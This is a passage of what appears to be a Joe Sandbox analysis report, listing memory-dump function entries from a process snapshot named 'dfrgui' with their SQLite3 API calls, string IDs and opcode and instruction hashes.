                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                  • String ID:
                                  • API String ID: 3723316075-0
                                  • Opcode ID: 5bb083ce7b55658ed5000a96a36b8ac8afc5bcfb9e12c57a4192e2f3b2459be3
                                  • Instruction ID: 22e8a2bc36b0d42e25d0c77893fd0e4e20206209d4327523fa6a2cec838ffccf
                                  • Opcode Fuzzy Hash: 5bb083ce7b55658ed5000a96a36b8ac8afc5bcfb9e12c57a4192e2f3b2459be3
                                  • Instruction Fuzzy Hash: DC7158B09086558FDB00DF69C4C479ABBE1BF89318F25C4ADD8899B366DB38D845CF81
                                  Function 61E33A22 Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                  • String ID:
                                  • API String ID: 3428878466-0
                                  • Opcode ID: 95864ebcf0e2298551cabad4a871c2290fd186f0101a9e085c7b10dd8f6295b1
                                  • Instruction ID: 355e2b8cb1278eb5bb79b524e4f87f4515eb57521e46ccb7f5d3ab20dc6cde23
                                  • Opcode Fuzzy Hash: 95864ebcf0e2298551cabad4a871c2290fd186f0101a9e085c7b10dd8f6295b1
                                  • Instruction Fuzzy Hash: 3871EF74E042599FCB04DFA9D490A9DBBF1BF88314F24856AE898EB340D734E842CF50
                                  Function 61E0C41B Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free
                                  • String ID:
                                  • API String ID: 2313487548-0
                                  • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                  • Instruction ID: 71a55a7d616f880c6bdc8a4c5e389ca44c687151b43596882eee45a475f76756
                                  • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                  • Instruction Fuzzy Hash: 33110074A08B458BCB00AF78D0C4518FBE4FF44365B928A9DDC8A8B315D774D890DF99
                                  Function 61E34159 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 341COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: false$null$true
                                  • API String ID: 0-2913297407
                                  • Opcode ID: 4120854c961fb7a129c0cf75dd5ba554b5ab6f27949bfffe702a06dacc813c26
                                  • Instruction ID: 88350f93bf3a9fb15db359703092d7e21feef64f1403ccf99d6190b6fc08c256
                                  • Opcode Fuzzy Hash: 4120854c961fb7a129c0cf75dd5ba554b5ab6f27949bfffe702a06dacc813c26
                                  • Instruction Fuzzy Hash: D1C1B071E096A98BDB01CE98C48079DBBF2ABCA318F29C16BD9546B345C336D846CB51
                                  Function 61E88595 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 264COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                  • String ID: ;
                                  • API String ID: 1657278834-1661535913
                                  • Opcode ID: da8f91e732288bb094edf8c6fa72473f4e13678dfea5d0a6fcf4d30e0b11346a
                                  • Instruction ID: e9485de3ef44b4de5443cb2e0bde6b88a97942ad51845ad10af4ce7822b2a5d8
                                  • Opcode Fuzzy Hash: da8f91e732288bb094edf8c6fa72473f4e13678dfea5d0a6fcf4d30e0b11346a
                                  • Instruction Fuzzy Hash: 2DB16B75A0564ADBDB40CFA9C480B8DB7B1FF5A318F28C429EC58AB314D734E902DB51
                                  Function 61E6FA85 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc64.SQLITE3 ref: 61E6FAFC
                                  • sqlite3_exec.SQLITE3 ref: 61E6FB2F
                                  • sqlite3_free_table.SQLITE3 ref: 61E6FB49
                                  • sqlite3_free.SQLITE3 ref: 61E6FB5D
                                  • sqlite3_mprintf.SQLITE3 ref: 61E6FB70
                                  • sqlite3_free.SQLITE3 ref: 61E6FB7D
                                  • sqlite3_free.SQLITE3 ref: 61E6FB96
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_free_table.SQLITE3 ref: 61E6FBAB
                                    • Part of subcall function 61E09CDB: sqlite3_free.SQLITE3 ref: 61E09D09
                                  • sqlite3_realloc64.SQLITE3 ref: 61E6FBCF
                                  • sqlite3_free_table.SQLITE3 ref: 61E6FBE1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                  • String ID:
                                  • API String ID: 3621699333-0
                                  • Opcode ID: 70bfde23032c9f67013ddaa15e66df8ae087e201a6c813e2561866aa9b2799ad
                                  • Instruction ID: d430e169caf67b8e93c2c9b0565809fa1c2ecd18f5517dc9cb4555253bd7cbf9
                                  • Opcode Fuzzy Hash: 70bfde23032c9f67013ddaa15e66df8ae087e201a6c813e2561866aa9b2799ad
                                  • Instruction Fuzzy Hash: 605100B09056099BEB00CFA8D59479EBBF5BF88318F608429E895AB344D378E850CF95
                                  Function 61E7600F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7692F), ref: 61E7604E
                                  • sqlite3_finalize.SQLITE3 ref: 61E760CE
                                  • sqlite3_finalize.SQLITE3 ref: 61E7611D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_finalize$sqlite3_step
                                  • String ID: integer$null$real$Va
                                  • API String ID: 2395141310-835850008
                                  • Opcode ID: 8d9ff9554349cd1f3024cf3b67872253a96a84a6eed5d4daa054d94cf84d4310
                                  • Instruction ID: c8a8e15de50781a883045a0f55c18bb2bd389e4472d9bc1872f83eac2ac50a54
                                  • Opcode Fuzzy Hash: 8d9ff9554349cd1f3024cf3b67872253a96a84a6eed5d4daa054d94cf84d4310
                                  • Instruction Fuzzy Hash: D65101B0A047558FEB14CF68D48469ABBF0BF8D318F25C96DD848AB311D379E850CBA5
                                  Function 61E19A0E Relevance: 13.9, APIs: 9, Instructions: 399COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_malloc
                                  • String ID:
                                  • API String ID: 423083942-0
                                  • Opcode ID: 261b71166ed69a50286be0cddd90619f6acff6e56a19cdd3572a826c93999297
                                  • Instruction ID: 675ee7a6204c74379cd27fff28ebadf21069c5b3a07dc6fc6ec52d17617fdf7a
                                  • Opcode Fuzzy Hash: 261b71166ed69a50286be0cddd90619f6acff6e56a19cdd3572a826c93999297
                                  • Instruction Fuzzy Hash: 4D02E275A09209DFDB04CFA8D581A8EBBF1BF88314F25C559E815AB319D734E942CFA0
                                  Function 61E256C5 Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E256E4
                                  • sqlite3_result_error_toobig.SQLITE3 ref: 61E257C5
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E257EB
                                  • sqlite3_snprintf.SQLITE3 ref: 61E25A67
                                  • sqlite3_snprintf.SQLITE3 ref: 61E25A94
                                  • sqlite3_snprintf.SQLITE3 ref: 61E25A9E
                                  • sqlite3_snprintf.SQLITE3 ref: 61E25B04
                                  • sqlite3_result_text.SQLITE3 ref: 61E25C27
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                  • String ID:
                                  • API String ID: 2444656285-0
                                  • Opcode ID: f04f9aef71e9eff02e44b8e7426ac61a8691330cc8e78df77641058fc7378fcd
                                  • Instruction ID: 9ef6f9eddbbc02a6ec4b07e097aa7ca18a29a01ea5a9b579db5fc7818d5df7c2
                                  • Opcode Fuzzy Hash: f04f9aef71e9eff02e44b8e7426ac61a8691330cc8e78df77641058fc7378fcd
                                  • Instruction Fuzzy Hash: 69E19D7498835ACFDB208F58C9907E9BBF0BF89314F65C4A9D89897348D734D9868F42
                                  Function 61E24F57 Relevance: 13.6, APIs: 9, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_mallocsqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                  • String ID:
                                  • API String ID: 1733351873-0
                                  • Opcode ID: 10bf254599beba4073dd1f8b48ee65a0169f06aec4d883e0070ddc3dbd74e9da
                                  • Instruction ID: 70ce6709fe91db89897a7fcba20294cf9185aa11bef78e9a2bcbeb868b7654b3
                                  • Opcode Fuzzy Hash: 10bf254599beba4073dd1f8b48ee65a0169f06aec4d883e0070ddc3dbd74e9da
                                  • Instruction Fuzzy Hash: 4231DB70A047468BDB40DFB9C894A9EBBE4BF88344F20C92ED888D7305E739D851CB51
                                  Function 61E89EE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                  • String ID: @
                                  • API String ID: 1503958624-2766056989
                                  • Opcode ID: 9d68efab7e9512ba469a8fb30240f339ffe0b6f471871ef1638d816100d8c958
                                  • Instruction ID: 4fc1d621848c9fe18acfed9e4674f1cd1c57fd3364abffd76f9fe15ab75e5f6f
                                  • Opcode Fuzzy Hash: 9d68efab7e9512ba469a8fb30240f339ffe0b6f471871ef1638d816100d8c958
                                  • Instruction Fuzzy Hash: 644158B1909B019FD780EF69C58461ABBF0FF85358F65C91DE89987390E334E884CB52
                                  Function 61E34956 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E3496C
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E34991
                                  • sqlite3_result_text.SQLITE3 ref: 61E349BE
                                  • sqlite3_result_text.SQLITE3 ref: 61E349E4
                                  • sqlite3_result_subtype.SQLITE3 ref: 61E349F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                  • String ID: ,a$J
                                  • API String ID: 3250357221-507871578
                                  • Opcode ID: 2261931d02bc9a248e54d4f3bc1956d3623cd1f5bdea204b53e1ac6c3da67650
                                  • Instruction ID: 594cd01ad22c4ae82ab9a85ed11f6f25413904805aaf3d3475e2f5e04febf970
                                  • Opcode Fuzzy Hash: 2261931d02bc9a248e54d4f3bc1956d3623cd1f5bdea204b53e1ac6c3da67650
                                  • Instruction Fuzzy Hash: 36112EB05087919FD700AF69D08231ABFE4AF85718F24C94EE8D88B345D376C895CF96
                                  Function 61E3481A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E34830
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E34853
                                  • sqlite3_result_text.SQLITE3 ref: 61E34880
                                  • sqlite3_result_text.SQLITE3 ref: 61E348A6
                                  • sqlite3_result_subtype.SQLITE3 ref: 61E348B6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                  • String ID: )a$J
                                  • API String ID: 3250357221-1453690686
                                  • Opcode ID: aec0737fff145ed480e74b2b321e617bc152f67cc82beb525c8cf723b6dbcb5d
                                  • Instruction ID: fab2bab5c6bd87eed0f0cf62028d8d4a4fc5f12c967af494d5cc56a24bef2959
                                  • Opcode Fuzzy Hash: aec0737fff145ed480e74b2b321e617bc152f67cc82beb525c8cf723b6dbcb5d
                                  • Instruction Fuzzy Hash: AA112AB05087909BD700AF68C08131ABFE4AF85718F24C94EF8988B385D376C855CB96
                                  Function 61E5E2AC Relevance: 12.2, APIs: 8, Instructions: 215COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E28FC6: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5DB29), ref: 61E2900A
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E5E2F5
                                  • sqlite3_prepare_v2.SQLITE3 ref: 61E5E333
                                  • sqlite3_step.SQLITE3 ref: 61E5E388
                                  • sqlite3_errmsg.SQLITE3 ref: 61E5E525
                                    • Part of subcall function 61E26168: sqlite3_log.SQLITE3 ref: 61E26191
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
